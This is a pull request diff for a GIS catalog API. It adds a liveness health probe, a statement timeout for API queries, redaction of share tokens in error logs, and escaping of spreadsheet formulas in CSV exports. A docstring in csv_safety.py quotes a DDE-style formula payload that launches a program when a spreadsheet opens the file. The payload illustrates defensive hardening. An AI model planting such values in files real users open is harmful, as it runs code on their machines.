### PR TITLE
fix(platform,tiles,worker,export): thirteen items from the 2026-08-30 audit

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -678,6 +678,16 @@ FRONTEND_PORT=8080
 # so it can reach the worker without being written to a job row. Without this,
 # POST /datasets/{id}/refresh with a token answers 503
 # credential_store_unavailable.
+# fix(#1778): with this unset AND UVICORN_WORKERS raised above 1, the gap is
+# wider than the note above describes. Each uvicorn worker keeps its own
+# process-local tile cache, and a feature insert, update or delete invalidates
+# only the cache of the worker that served the write. The other workers keep
+# their pre-edit MVT until TILE_CACHE_TTL expires, so the same edit appears and
+# disappears as requests round-robin across workers. The client-side `_v=` cache
+# buster does not close this: the vector tile route does not accept it, so it
+# never reaches the server-side cache key (the raster route does, which is why
+# raster does not have this behaviour). Set REDIS_URL for any deployment that
+# runs more than one uvicorn worker and edits features.
 # Type: string | No default
 # Example: redis://redis:6379/0
 # REDIS_URL=

--- a/.env.example
+++ b/.env.example
@@ -1020,9 +1020,11 @@ FRONTEND_PORT=8080
 # fix(#1778): DB_POOL_TIMEOUT bounds how long a request waits for a CONNECTION,
 # never how long a statement runs, so one pathological plan could pin a pool
 # slot indefinitely -- and uvicorn does not cancel a handler when its client
-# disconnects, so the query outlived the request. Applied to every connection
-# the API process opens, which covers both the get_db dependency and the
-# request-scoped sessions handlers open directly. The Procrastinate worker is a
+# disconnects, so the query outlived the request. Issued as SET LOCAL at the
+# start of every transaction the API process opens, which covers both the
+# get_db dependency and the request-scoped sessions handlers open directly, and
+# which is safe under DB_USE_EXTERNAL_POOLER=true (nothing goes in the startup
+# packet, and nothing outlives a transaction). The Procrastinate worker is a
 # separate process and is deliberately excluded: it runs single statements for
 # minutes while indexing or reprojecting a freshly ingested table. The default
 # sits inside the edge proxy's 600s read timeout, so a query that trips it has

--- a/.env.example
+++ b/.env.example
@@ -1006,6 +1006,18 @@ FRONTEND_PORT=8080
 # Type: integer (minimum 1) | Default: 30
 # DB_POOL_TIMEOUT=30
 
+# [OPTIONAL] Per-request query deadline, in seconds. 0 disables it.
+# fix(#1778): DB_POOL_TIMEOUT bounds how long a request waits for a CONNECTION,
+# never how long a statement runs. Applied by the get_db dependency to every
+# transaction an HTTP request opens, so one pathological plan cannot pin a pool
+# slot indefinitely. It is deliberately NOT a session default on the engine:
+# the worker shares that engine and legitimately runs single statements for
+# minutes while indexing or reprojecting a freshly ingested table. The default
+# sits inside the edge proxy's 600s read timeout, so a query that trips it has
+# already lost its client.
+# Type: integer (minimum 0; 0 disables) | Default: 300
+# DB_STATEMENT_TIMEOUT_SECONDS=300
+
 # [OPTIONAL] Seconds after which a connection is recycled (replaced)
 # Prevents stale connections with managed databases.
 # Type: integer (minimum -1; -1 disables recycling) | Default: 1800

--- a/.env.example
+++ b/.env.example
@@ -1016,12 +1016,14 @@ FRONTEND_PORT=8080
 # Type: integer (minimum 1) | Default: 30
 # DB_POOL_TIMEOUT=30
 
-# [OPTIONAL] Per-request query deadline, in seconds. 0 disables it.
+# [OPTIONAL] Query deadline for the API, in seconds. 0 disables it.
 # fix(#1778): DB_POOL_TIMEOUT bounds how long a request waits for a CONNECTION,
-# never how long a statement runs. Applied by the get_db dependency to every
-# transaction an HTTP request opens, so one pathological plan cannot pin a pool
-# slot indefinitely. It is deliberately NOT a session default on the engine:
-# the worker shares that engine and legitimately runs single statements for
+# never how long a statement runs, so one pathological plan could pin a pool
+# slot indefinitely -- and uvicorn does not cancel a handler when its client
+# disconnects, so the query outlived the request. Applied to every connection
+# the API process opens, which covers both the get_db dependency and the
+# request-scoped sessions handlers open directly. The Procrastinate worker is a
+# separate process and is deliberately excluded: it runs single statements for
 # minutes while indexing or reprojecting a freshly ingested table. The default
 # sits inside the edge proxy's 600s read timeout, so a query that trips it has
 # already lost its client.

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -237,6 +237,11 @@ jobs:
               # replica, because the job counters live in the process that did
               # the work and an unscraped replica is invisible.
               - 'infra/monitoring/prometheus.yml'
+              # fix(#1778 codex r8): and the dashboard, for the other half of
+              # that -- once discovery finds every replica, a panel reading a
+              # per-replica job series without an aggregator draws one partial
+              # line per replica.
+              - 'infra/monitoring/grafana-dashboard.json'
               # fix(#561): a change to this workflow can alter HOW Backend Tests
               # runs (e.g. the -n4 parallelization / coverage core), so the suite
               # must run on PRs that touch it — otherwise CI-config changes ship

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -232,6 +232,11 @@ jobs:
               # catch a selector matching nothing.
               - 'infra/monitoring/alerts.yml'
               - 'infra/monitoring/alerts.test.yml'
+              # fix(#1778): test_alert_rules.py reads this one by literal path
+              # too -- it checks that the worker scrape job discovers every
+              # replica, because the job counters live in the process that did
+              # the work and an unscraped replica is invisible.
+              - 'infra/monitoring/prometheus.yml'
               # fix(#561): a change to this workflow can alter HOW Backend Tests
               # runs (e.g. the -n4 parallelization / coverage core), so the suite
               # must run on PRs that touch it — otherwise CI-config changes ship
@@ -1098,6 +1103,15 @@ jobs:
         run: |
           docker run --rm -v "$PWD/infra/monitoring:/w:ro" \
             --entrypoint promtool "$PROMETHEUS_IMAGE" test rules /w/alerts.test.yml
+
+      # fix(#1778): the scrape config was never validated by anything. It grew
+      # a dns_sd_configs block so the worker job discovers every replica, and a
+      # typo there is a config Prometheus refuses at startup — which an
+      # operator finds out about instead of CI.
+      - name: promtool check config
+        run: |
+          docker run --rm -v "$PWD/infra/monitoring:/w:ro" \
+            --entrypoint promtool "$PROMETHEUS_IMAGE" check config /w/prometheus.yml
 
   # ---------- CLI ----------
   # Structural enforcement that the CLI never grows

--- a/Dockerfile
+++ b/Dockerfile
@@ -165,8 +165,15 @@ LABEL org.opencontainers.image.description="PostGIS-native GIS data catalog API"
 LABEL org.opencontainers.image.licenses="Apache-2.0"
 LABEL org.opencontainers.image.source="https://github.com/geolens-io/geolens"
 
+# fix(#1778): liveness, not readiness. /health probes the database, the object
+# store and the cache and 503s if any of them is degraded, but the cache path
+# falls back to an in-memory cache by design, so a Valkey outage the API can
+# serve straight through used to mark this container unhealthy -- and the
+# frontend's `depends_on: api: service_healthy` then refused to start the UI at
+# all. /health is still the readiness view; point orchestrator readiness probes
+# and dashboards at it.
 HEALTHCHECK --interval=10s --timeout=5s --start-period=20s --retries=3 \
-  CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8000/health')"
+  CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8000/health/live')"
 
 USER appuser
 

--- a/RUNBOOK.md
+++ b/RUNBOOK.md
@@ -1440,10 +1440,41 @@ GeoLens exports Prometheus metrics out of the box. Reference scrape config, aler
 rules, and a Grafana dashboard ship in [`infra/monitoring/`](infra/monitoring/) —
 point your monitoring stack at them, or use them as a base for an existing one.
 
-**Uptime/liveness checks must target `/api/health`** (JSON `status`, `version`,
-`build`). Behind the bundled Nginx, a bare `/health` is not an API route — the
-frontend SPA catch-all answers it with HTML `200`, which an uptime monitor will
-happily (and wrongly) accept.
+**Liveness checks must target `/api/health/live`; `/api/health` is readiness.**
+The two answer different questions and are not interchangeable:
+
+| Probe | Endpoint | Answers | Fails when |
+|---|---|---|---|
+| Liveness | `/api/health/live` | Is the process up and its event loop turning? | The API process is wedged or gone |
+| Readiness | `/api/health` | Did every dependency answer? (JSON `status`, `version`, `build`, per-provider latencies) | The database, object store **or cache** is degraded |
+
+Point an orchestrator's `livenessProbe`, an uptime monitor, and any
+restart-on-failure check at `/api/health/live`. Pointing them at `/api/health`
+restarts a container that is serving catalog reads perfectly well because
+Valkey is down — the cache path is built to survive that, falling back to an
+in-memory cache. Use `/api/health` for a `readinessProbe`, for a load
+balancer's backend check, and for a dashboard, where knowing a dependency is
+degraded is the point.
+
+Two practical differences on top of that:
+
+- `/api/health` is rate-limited to 60 requests/minute per IP (it probes
+  dependencies on every call), which a one-second liveness probe exhausts on
+  its own before any other traffic — and a probe answered `429` reads as a
+  dead process. `/api/health/live` is exempt from the limiter: it touches
+  nothing.
+- `/api/health/live` is deliberately absent from the OpenAPI schema and the
+  generated SDKs, like the worker's own probes. It is infrastructure surface,
+  not API surface; call it with `curl`, not through a client.
+
+Behind the bundled Nginx both live under `/api/`. A bare `/health` or
+`/health/live` is not an API route there — the frontend SPA catch-all answers
+it with HTML `200`, which an uptime monitor will happily (and wrongly) accept.
+
+The bundled Compose stack already follows this split: the api service's
+healthcheck (and the `frontend` service's `depends_on: api: condition:
+service_healthy`) probe `/health/live` inside the container, so a cache or
+object-store outage no longer stops the UI from starting.
 
 ### Metrics & alerting (Prometheus / Grafana)
 

--- a/backend/app/api/main.py
+++ b/backend/app/api/main.py
@@ -1702,6 +1702,38 @@ _last_health_status: str = "healthy"
 _HEALTH_ALERT_COOLDOWN_SECS: float = 300.0
 
 
+# fix(#1778): liveness, split out from readiness. `/health` probes the database,
+# the object store AND the cache, and 503s if any of them is down -- but the
+# cache path is explicitly engineered to survive a Valkey outage (it falls back
+# to an in-memory cache behind a circuit breaker), so a dependency the API can
+# serve straight through still marked the container unhealthy. That is the
+# Docker healthcheck AND the gate on `frontend: depends_on: api:
+# service_healthy`, so a restart during a Valkey or MinIO outage left the whole
+# UI down because the cache was down; under an orchestrator with an HTTP
+# liveness probe on `/health` the pod is killed and restarted in a loop while
+# the API is perfectly able to serve catalog reads.
+#
+# `/health` keeps its meaning (readiness: every dependency answered). This route
+# answers only "the process is up and the event loop is turning", mirroring the
+# worker's own split in observability/health/worker.py, and is what the
+# container healthcheck and any liveness probe should target.
+#
+# `include_in_schema=False` for the same reason the worker's probes are absent
+# from the contract: it is infrastructure surface, not API surface, and no SDK
+# or CLI caller has a use for it.
+#
+# Exempt from the limiter rather than capped at 60/min like `/health`: a
+# kubelet probing every second from one source address is already at that cap
+# before any other traffic, and a liveness probe that answers 429 gets the pod
+# killed. GAP-016 capped `/health` because it probes dependencies on every
+# call; this handler touches nothing and allocates one dict.
+@app.get("/health/live", include_in_schema=False, tags=["Health"])
+@limiter.exempt
+async def health_live(request: Request):
+    """Liveness probe: process is up, no dependency checks."""
+    return {"status": "ok"}
+
+
 # GAP-016: /health is rate-limited (60/min per IP) rather than fully exempt, to
 # bound abuse of this unauthenticated, dependency-probing endpoint. The limit is
 # deliberately generous: the Docker container healthcheck polls every 10s

--- a/backend/app/api/main.py
+++ b/backend/app/api/main.py
@@ -381,9 +381,9 @@ def install_api_query_deadline() -> None:
     way -- so binding it inside ``get_db`` left every one of those pinning a
     pool slot with no deadline.
 
-    Called at import of this module, not from the lifespan, because
-    ``do_connect`` only fires for connections opened after it is registered and
-    the pool must not have connected first. Called AGAIN from the lifespan so a
+    Called at import of this module, and not only from the lifespan, because
+    the listener fires for transactions begun after it is registered and the
+    lifespan's own boot probe opens one. Called AGAIN from the lifespan so a
     test fixture that has rebound ``app.core.db.engine`` to the test engine
     gets it too; the installer is idempotent.
 

--- a/backend/app/api/main.py
+++ b/backend/app/api/main.py
@@ -859,8 +859,23 @@ register_error_handlers(app)
 app.state.limiter = limiter
 
 
-async def _rate_limit_handler(request: Request, exc: RateLimitExceeded) -> JSONResponse:
+def _rate_limit_handler(request: Request, exc: RateLimitExceeded) -> JSONResponse:
     # fix(#315): advertise the retry window (exc.limit.limit.get_expiry(), seconds).
+    #
+    # fix(#1778): a plain def, not a coroutine, and it must stay one. slowapi's
+    # SlowAPIMiddleware enforces the GLOBAL default limit inside a synchronous
+    # BaseHTTPMiddleware dispatch and resolves this handler through
+    # `sync_check_limits`, which silently swaps a coroutine handler for
+    # slowapi's own `_rate_limit_exceeded_handler` ("cannot execute
+    # asynchronous code in a synchronous middleware"). That fallback returns a
+    # bare {"error": ...} in application/json with no Retry-After, because the
+    # Limiter is not built with headers_enabled. Only routes carrying an
+    # explicit @limiter.limit decorator take the exception-handler path
+    # instead, which is why every test of this contract passed while the
+    # majority of routes -- the undecorated ones -- answered a rate-limit
+    # rejection with a shape no SDK, CLI or apiFetch caller can parse. Nothing
+    # here awaits, so a sync handler serves both paths identically; Starlette
+    # runs it in a threadpool on the exception-handler path.
     headers = {}
     try:
         headers["Retry-After"] = str(int(exc.limit.limit.get_expiry()))

--- a/backend/app/api/main.py
+++ b/backend/app/api/main.py
@@ -58,7 +58,7 @@ from app.platform.ratelimit import limiter
 from app.processing.ingest.tasks import task_app
 from app.api.middleware.body_limit import RequestBodyLimitMiddleware
 from app.api.middleware.cors import DynamicCORSMiddleware
-from app.api.middleware.logging import RequestLoggingMiddleware
+from app.api.middleware.logging import RequestLoggingMiddleware, safe_access_log_path
 from app.api.middleware.security import SecurityHeadersMiddleware
 from app.api.middleware.tenant_context import TenantContextMiddleware
 from app.processing.tiles.pool import close_tile_pool, init_tile_pool
@@ -941,7 +941,10 @@ async def _database_error_handler(request: Request, exc: DBAPIError) -> JSONResp
         raise exc
     logger.exception(
         "Operational database error",
-        path=request.url.path,
+        # fix(#1778): the path can be /api/maps/shared/{token}; the access-log
+        # line for the same request has been redacted since #821 and this one
+        # was not, so a 503 here published a replayable share capability.
+        path=safe_access_log_path(request.url.path),
         sqlstate=sqlstate(exc),
     )
     return JSONResponse(

--- a/backend/app/api/main.py
+++ b/backend/app/api/main.py
@@ -372,9 +372,46 @@ async def _sweep_orphaned_exports_and_log(exports_dir: Path, log) -> None:
         log.info("Swept orphaned exports", deleted=deleted)
 
 
+def install_api_query_deadline() -> None:
+    """Put the API's statement deadline on the engine this process uses.
+
+    fix(#1778 codex r2): on the engine rather than on one dependency. Handlers
+    open request-scoped sessions directly through ``async_session()`` in more
+    than twenty modules -- ``GET /stac/collections`` runs three aggregates that
+    way -- so binding it inside ``get_db`` left every one of those pinning a
+    pool slot with no deadline.
+
+    Called at import of this module, not from the lifespan, because
+    ``do_connect`` only fires for connections opened after it is registered and
+    the pool must not have connected first. Called AGAIN from the lifespan so a
+    test fixture that has rebound ``app.core.db.engine`` to the test engine
+    gets it too; the installer is idempotent.
+
+    The engine is late-bound per fix(#909) -- the client fixture reassigns
+    ``db_module.engine``, and a module-scope binding here would snapshot the
+    dev engine past that patch.
+
+    The worker entrypoint never imports this module, so its engine keeps no
+    deadline. That is the point: it runs single statements for minutes while
+    building a spatial index over a freshly ingested table.
+    """
+    from app.core.db import engine
+    from app.core.statement_timeout import install_api_statement_timeout
+
+    install_api_statement_timeout(engine)
+
+
+install_api_query_deadline()
+
+
 @asynccontextmanager
 async def lifespan(app: FastAPI):
     from app.core.db import engine  # fix(#909): late-bind for tests
+
+    # fix(#1778 codex r2): again, against whatever `app.core.db.engine` is NOW.
+    # Import time covers the real process; this covers a test fixture that has
+    # rebound the attribute to the test engine since. Idempotent.
+    install_api_query_deadline()
 
     for attempt in range(1, 4):
         try:

--- a/backend/app/api/middleware/body_limit.py
+++ b/backend/app/api/middleware/body_limit.py
@@ -39,6 +39,7 @@ from typing import Any
 
 from starlette.responses import JSONResponse
 
+from app.api.middleware.liveness import is_liveness_request
 from app.standards.ogc.errors import ProblemDetail
 
 # Sync in-memory cache for the upload limit — avoids an async DB pool
@@ -277,7 +278,17 @@ class RequestBodyLimitMiddleware:
         # _refresh_limit_cache populates the sync _limit_cache; _get_upload_limit
         # reads it.  Per GAP-001, non-upload routes use DEFAULT_BODY_LIMIT_BYTES
         # as the route_override so the large upload limit never applies to them.
-        await _refresh_limit_cache()
+        #
+        # fix(#1778 codex r7): skipped for the liveness probe. The refresh is
+        # already failure-tolerant -- it catches everything and falls back to
+        # the cached or boot-time limit -- so an outage does not FAIL the probe,
+        # but it does make it WAIT: once the 30s cache expires, every request
+        # pays a connection attempt, and against a blackholed database that is
+        # the probe's whole timeout budget spent before the handler runs. A
+        # probe that answers too late is indistinguishable from a dead process.
+        # The size cap still applies, from the cached or fallback value.
+        if not is_liveness_request(scope):
+            await _refresh_limit_cache()
 
         path = scope.get("path", "")
         method = scope.get("method", "")

--- a/backend/app/api/middleware/cors.py
+++ b/backend/app/api/middleware/cors.py
@@ -7,6 +7,7 @@ from starlette.middleware.base import BaseHTTPMiddleware
 from starlette.requests import Request
 from starlette.responses import Response
 
+from app.api.middleware.liveness import is_liveness_request
 from app.standards.ogc.utils import standards_api_path
 
 # In-memory cache to avoid a DB pool checkout on every CORS request.
@@ -111,6 +112,17 @@ class DynamicCORSMiddleware(BaseHTTPMiddleware):
         return response
 
     async def _dispatch(self, request: Request, call_next) -> Response:
+        # fix(#1778 codex r7): the liveness probe gets no CORS policy and, more
+        # to the point, triggers no policy LOOKUP. `_is_origin_allowed` reads
+        # CORS_ALLOWED_ORIGINS out of the database whenever its 60s cache has
+        # expired, so a probe that happens to carry an Origin header would
+        # block on the database on the one request that must not depend on it.
+        # A probe is not a browser resource; it needs no Access-Control header,
+        # and this middleware already returns without one whenever the origin
+        # is not permitted.
+        if is_liveness_request(request.scope):
+            return await call_next(request)
+
         origin = request.headers.get("origin")
 
         # No origin header -- not a CORS request, pass through

--- a/backend/app/api/middleware/liveness.py
+++ b/backend/app/api/middleware/liveness.py
@@ -1,0 +1,57 @@
+"""The one definition of "this request is the liveness probe".
+
+fix(#1778 codex r7): ``/health/live`` exists so an orchestrator can ask whether
+the API process is alive without asking whether its dependencies are. Answering
+that question honestly means the request must not touch the database, the cache
+or object storage on its way to the handler -- and the handler is only the last
+step. Three middlewares on the request path have a DB-backed branch, and in
+multi_tenant mode one of them turned a database outage into a ``403`` on the
+probe, which is precisely the restart loop the readiness/liveness split was
+added to prevent.
+
+The predicate lives here, in one module, because the alternative is three
+independent path checks that drift. A middleware added later with a DB-backed
+branch has one obvious thing to call, and the structural test in
+``tests/test_health_liveness_split_1778.py`` fails if it does not.
+
+Path matching is exact rather than prefix-based. ``scope["path"]`` is what the
+app sees, which is ``/health/live`` both directly and behind the bundled Nginx
+(``location /api/`` rewrites ``^/api/(.*)`` to ``/$1`` before proxying).
+``/api/health/live`` is accepted as well, for an edge that proxies without that
+rewrite, and an ASGI ``root_path`` mount is stripped first, the way
+``DynamicCORSMiddleware._request_path`` already does it.
+"""
+
+from __future__ import annotations
+
+from typing import Any, Mapping
+
+#: The app-side liveness route, and the form an un-rewriting edge would pass.
+LIVENESS_PATHS: frozenset[str] = frozenset({"/health/live", "/api/health/live"})
+
+
+def liveness_request_path(scope: Mapping[str, Any]) -> str:
+    """The request path with any ASGI ``root_path`` prefix removed."""
+    path = scope.get("path", "") or ""
+    root_path = (scope.get("root_path", "") or "").rstrip("/")
+    if root_path and path.startswith(root_path):
+        path = path[len(root_path) :] or "/"
+    return path
+
+
+def is_liveness_request(scope: Mapping[str, Any]) -> bool:
+    """True when this request is the liveness probe.
+
+    Callers short-circuit their DB-backed work on it. The failure direction is
+    deliberate: a false negative costs the probe a dependency lookup, while a
+    false positive would only skip work on a route that returns a fixed
+    ``{"status": "ok"}`` and reads no request state.
+
+    No trailing-slash normalization: FastAPI is mounted with
+    ``redirect_slashes=False``, so ``/health/live/`` is a 404 rather than a
+    redirect, and treating it as the probe would skip middleware for a request
+    that cannot reach the handler anyway.
+    """
+    if scope.get("type") != "http":
+        return False
+    return liveness_request_path(scope) in LIVENESS_PATHS

--- a/backend/app/api/middleware/logging.py
+++ b/backend/app/api/middleware/logging.py
@@ -1,6 +1,5 @@
 """Request logging middleware with structured output and request ID tracking."""
 
-import re
 import time
 import uuid
 
@@ -9,14 +8,16 @@ from starlette.middleware.base import BaseHTTPMiddleware
 from starlette.requests import Request
 from starlette.responses import Response
 
+# fix(#1778): one redactor for every log line that carries a request path. It
+# moved to core/ so the two 5xx handlers can use it too -- they logged the raw
+# path, so a 500 or an operational-DB 503 on a shared-map request wrote the
+# capability the access-log line beside it had just redacted. Re-exported here
+# because this is where callers and tests have always imported it from.
+from app.core.logging_config import safe_access_log_path
+
+__all__ = ["RequestLoggingMiddleware", "access_logger", "safe_access_log_path"]
+
 access_logger = structlog.stdlib.get_logger("api.access")
-
-_SHARED_MAP_PATH = re.compile(r"^(?P<prefix>/(?:api/)?maps/shared/)[^/]+")
-
-
-def safe_access_log_path(path: str) -> str:
-    """Remove bearer capability segments from paths written to access logs."""
-    return _SHARED_MAP_PATH.sub(r"\g<prefix>[REDACTED]", path, count=1)
 
 
 class RequestLoggingMiddleware(BaseHTTPMiddleware):

--- a/backend/app/api/middleware/tenant_context.py
+++ b/backend/app/api/middleware/tenant_context.py
@@ -46,6 +46,7 @@ from starlette.responses import JSONResponse
 
 from app.core.config import settings
 from app.core.db.tenant_session import current_tenant_var
+from app.api.middleware.liveness import is_liveness_request
 from app.core.tenancy import is_multi_tenant
 
 logger = structlog.stdlib.get_logger(__name__)
@@ -244,6 +245,21 @@ class TenantContextMiddleware(BaseHTTPMiddleware):
         # TSEAM-04 fast path: single_tenant is the default and the vast
         # majority of deployments. One boolean check, zero state mutation.
         if not is_multi_tenant():
+            return await call_next(request)
+
+        # fix(#1778 codex r7): the liveness probe resolves no tenant. A probe
+        # sent to a tenant hostname reaches `_resolve_tenant_uuid` below, which
+        # reads the public host registry out of the database; with the database
+        # unreachable that returns None and this middleware answers 403. The
+        # orchestrator then restarts an API that is alive and would have served
+        # catalog reads, which is the restart loop `/health/live` exists to
+        # prevent. The handler returns a fixed payload and reads no tenant
+        # state, so there is nothing to resolve for it.
+        #
+        # Deliberately BEFORE the Host checks as well, not just before the
+        # registry lookup: `_classify_tenant_host` rejects an untrusted Host
+        # with a 400, and a kubelet probing by pod IP sends exactly that.
+        if is_liveness_request(request.scope):
             return await call_next(request)
 
         # Resolve host and verified bearer signals independently. A host may

--- a/backend/app/core/config.py
+++ b/backend/app/core/config.py
@@ -669,12 +669,14 @@ class Settings(BaseSettings):
     # 0 disables the purge (keep history forever).
     ingest_jobs_retention_days: int = Field(default=30, ge=0)
 
-    # fix(#1778): per-request statement deadline, in seconds. 0 disables it.
-    # Applied by get_db to every transaction an HTTP request opens, never to
-    # the worker's sessions -- see app/core/statement_timeout.py. 300 sits well
-    # inside the edge proxy's 600s read timeout, so a query that would trip it
-    # has already lost its client; before this, nothing bounded execution on
-    # the main engine at any layer, and the query outlived the request.
+    # fix(#1778): statement deadline for the API, in seconds. 0 disables it.
+    # fix(#1778 codex r2): applied to every connection the API process opens,
+    # not just the get_db dependency -- handlers open request-scoped sessions
+    # directly in more than twenty modules. The worker is a separate process
+    # and is excluded; see app/core/statement_timeout.py. 300 sits well inside
+    # the edge proxy's 600s read timeout, so a query that would trip it has
+    # already lost its client; before this, nothing bounded execution on the
+    # main engine at any layer, and the query outlived the request.
     db_statement_timeout_seconds: int = Field(default=300, ge=0)
 
     # fix(#1249): how old an object under the `staging/` prefix must be before

--- a/backend/app/core/config.py
+++ b/backend/app/core/config.py
@@ -669,6 +669,14 @@ class Settings(BaseSettings):
     # 0 disables the purge (keep history forever).
     ingest_jobs_retention_days: int = Field(default=30, ge=0)
 
+    # fix(#1778): per-request statement deadline, in seconds. 0 disables it.
+    # Applied by get_db to every transaction an HTTP request opens, never to
+    # the worker's sessions -- see app/core/statement_timeout.py. 300 sits well
+    # inside the edge proxy's 600s read timeout, so a query that would trip it
+    # has already lost its client; before this, nothing bounded execution on
+    # the main engine at any layer, and the query outlived the request.
+    db_statement_timeout_seconds: int = Field(default=300, ge=0)
+
     # fix(#1249): how old an object under the `staging/` prefix must be before
     # the reconciliation sweep will delete it for having no ingest_jobs row.
     # Not a guess at how long an upload takes — the row check is what decides

--- a/backend/app/core/config.py
+++ b/backend/app/core/config.py
@@ -670,10 +670,12 @@ class Settings(BaseSettings):
     ingest_jobs_retention_days: int = Field(default=30, ge=0)
 
     # fix(#1778): statement deadline for the API, in seconds. 0 disables it.
-    # fix(#1778 codex r2): applied to every connection the API process opens,
+    # fix(#1778 codex r2): applied to every transaction the API process opens,
     # not just the get_db dependency -- handlers open request-scoped sessions
-    # directly in more than twenty modules. The worker is a separate process
-    # and is excluded; see app/core/statement_timeout.py. 300 sits well inside
+    # directly in more than twenty modules. fix(#1778 codex r3): as SET LOCAL,
+    # never as a startup parameter, so DB_USE_EXTERNAL_POOLER=true still
+    # connects. The worker is a separate process and is excluded; see
+    # app/core/statement_timeout.py. 300 sits well inside
     # the edge proxy's 600s read timeout, so a query that would trip it has
     # already lost its client; before this, nothing bounded execution on the
     # main engine at any layer, and the query outlived the request.

--- a/backend/app/core/csv_safety.py
+++ b/backend/app/core/csv_safety.py
@@ -1,0 +1,48 @@
+"""One spreadsheet-formula escaping rule for every CSV this product writes.
+
+fix(#1778): the rule was stated twice, in two private copies -- ``_safe_csv_cell``
+in ``modules/audit/router.py`` and ``_safe`` in ``modules/admin/router.py`` --
+and not at all in the third and most exposed writer. The dataset export
+(``processing/export/ogr.py``) hands ogr2ogr the table and ogr2ogr writes every
+attribute value verbatim; the writer side validates only the column NAME
+(``_COLUMN_NAME_RE`` in features/service.py), never the value. So an editor on
+any public dataset can store a property beginning with ``=``, ``+``, ``-`` or
+``@`` and any anonymous visitor who downloads the CSV distribution the DCAT
+record advertises executes it on open. That is a cross-privilege sink: the
+writer needs edit rights on one dataset, the victim needs none. It is also the
+one CSV in the product whose cells are wholly user-authored, while the two that
+were hardened carry mostly system-generated fields.
+
+The escape is a leading TAB, which spreadsheets treat as "this cell is text".
+
+A cell that parses as a plain decimal number is exempt, and that exemption is
+what makes the rule safe to apply to a data export rather than only to an audit
+log. ``-12`` is not a formula in any spreadsheet -- Excel, LibreOffice and
+Sheets all read it as the number -12, and a leading ``+`` is simply dropped --
+so tab-prefixing it would convert every negative measurement in an exported
+attribute table into text, for the spreadsheet AND for pandas, QGIS and every
+other reader. Anything that is NOT a well-formed number keeps the escape:
+``-12+A1`` and ``+1-cmd|'/c calc'!A0`` are not numbers, and neither is a bare
+``-``.
+"""
+
+from __future__ import annotations
+
+import re
+
+#: The characters a spreadsheet may read as the start of a formula.
+FORMULA_PREFIXES = ("=", "+", "-", "@")
+
+# Anchored, and deliberately narrow: an optional sign, digits with at most one
+# decimal point, an optional exponent. No thousands separators, no currency, no
+# leading or trailing space -- anything the regex is unsure about is escaped.
+_PLAIN_NUMBER_RE = re.compile(r"[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?\Z")
+
+
+def escape_csv_formula(value: str) -> str:
+    """Prefix a formula-triggering cell with a tab so it is read as text."""
+    if not value or value[0] not in FORMULA_PREFIXES:
+        return value
+    if _PLAIN_NUMBER_RE.match(value):
+        return value
+    return "\t" + value

--- a/backend/app/core/csv_safety.py
+++ b/backend/app/core/csv_safety.py
@@ -15,20 +15,27 @@ were hardened carry mostly system-generated fields.
 
 The escape is a leading TAB, which spreadsheets treat as "this cell is text".
 
-A cell that parses as a plain decimal number is exempt, and that exemption is
-what makes the rule safe to apply to a data export rather than only to an audit
-log. ``-12`` is not a formula in any spreadsheet -- Excel, LibreOffice and
-Sheets all read it as the number -12, and a leading ``+`` is simply dropped --
-so tab-prefixing it would convert every negative measurement in an exported
-attribute table into text, for the spreadsheet AND for pandas, QGIS and every
-other reader. Anything that is NOT a well-formed number keeps the escape:
-``-12+A1`` and ``+1-cmd|'/c calc'!A0`` are not numbers, and neither is a bare
-``-``.
+The default is strict: every cell starting with a trigger character is escaped,
+which is exactly what the audit-log and admin-user exports have always done. A
+username of ``+123`` or an account id of ``-001`` is a string that happens to
+look like a number, and stripping its protection to keep a spreadsheet from
+right-aligning it would be the wrong trade in a security log.
+
+fix(#1778 codex r1, narrowed r2): ``allow_numeric`` exists for the dataset
+export, and its callers must decide by COLUMN TYPE, never by the shape of the
+value. In a column the database calls ``integer`` or ``double precision``,
+``-12`` is a measurement: tab-prefixing it turns every negative reading in an
+exported attribute table into text, for pandas and QGIS as much as for Excel,
+and no spreadsheet reads a number as a formula anyway. In a text column ``-12``
+is a string a user typed, indistinguishable from the first half of ``-12+A1``,
+and it keeps the tab. ``numeric_column_names`` is the intended source of that
+decision.
 """
 
 from __future__ import annotations
 
 import re
+from collections.abc import Iterable, Mapping
 
 #: The characters a spreadsheet may read as the start of a formula.
 FORMULA_PREFIXES = ("=", "+", "-", "@")
@@ -36,13 +43,53 @@ FORMULA_PREFIXES = ("=", "+", "-", "@")
 # Anchored, and deliberately narrow: an optional sign, digits with at most one
 # decimal point, an optional exponent. No thousands separators, no currency, no
 # leading or trailing space -- anything the regex is unsure about is escaped.
+# It gates the value even inside a numeric column, so a NULL rendered as an
+# empty string or a driver-specific sentinel cannot slip through unescaped.
 _PLAIN_NUMBER_RE = re.compile(r"[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?\Z")
 
+# information_schema.columns.data_type values PostgreSQL reports for the numeric
+# types, which is what `get_column_info` stores in a dataset's column_info.
+NUMERIC_SQL_TYPES: frozenset[str] = frozenset(
+    {
+        "smallint",
+        "integer",
+        "bigint",
+        "decimal",
+        "numeric",
+        "real",
+        "double precision",
+    }
+)
 
-def escape_csv_formula(value: str) -> str:
-    """Prefix a formula-triggering cell with a tab so it is read as text."""
+
+def escape_csv_formula(value: str, *, allow_numeric: bool = False) -> str:
+    """Prefix a formula-triggering cell with a tab so it is read as text.
+
+    ``allow_numeric`` leaves a cell alone when it is a well-formed decimal
+    number. Pass it only for a column whose declared type is numeric; see the
+    module docstring for why the value's shape is not enough on its own.
+    """
     if not value or value[0] not in FORMULA_PREFIXES:
         return value
-    if _PLAIN_NUMBER_RE.match(value):
+    if allow_numeric and _PLAIN_NUMBER_RE.match(value):
         return value
     return "\t" + value
+
+
+def numeric_column_names(column_info: Iterable[Mapping] | None) -> frozenset[str]:
+    """Names of the columns a dataset's ``column_info`` declares numeric.
+
+    The one sanctioned input to ``allow_numeric``. ``column_info`` rows come
+    from ``get_column_info``, which stores ``information_schema.columns``'
+    ``data_type`` verbatim.
+    """
+    if not column_info:
+        return frozenset()
+    return frozenset(
+        name
+        for row in column_info
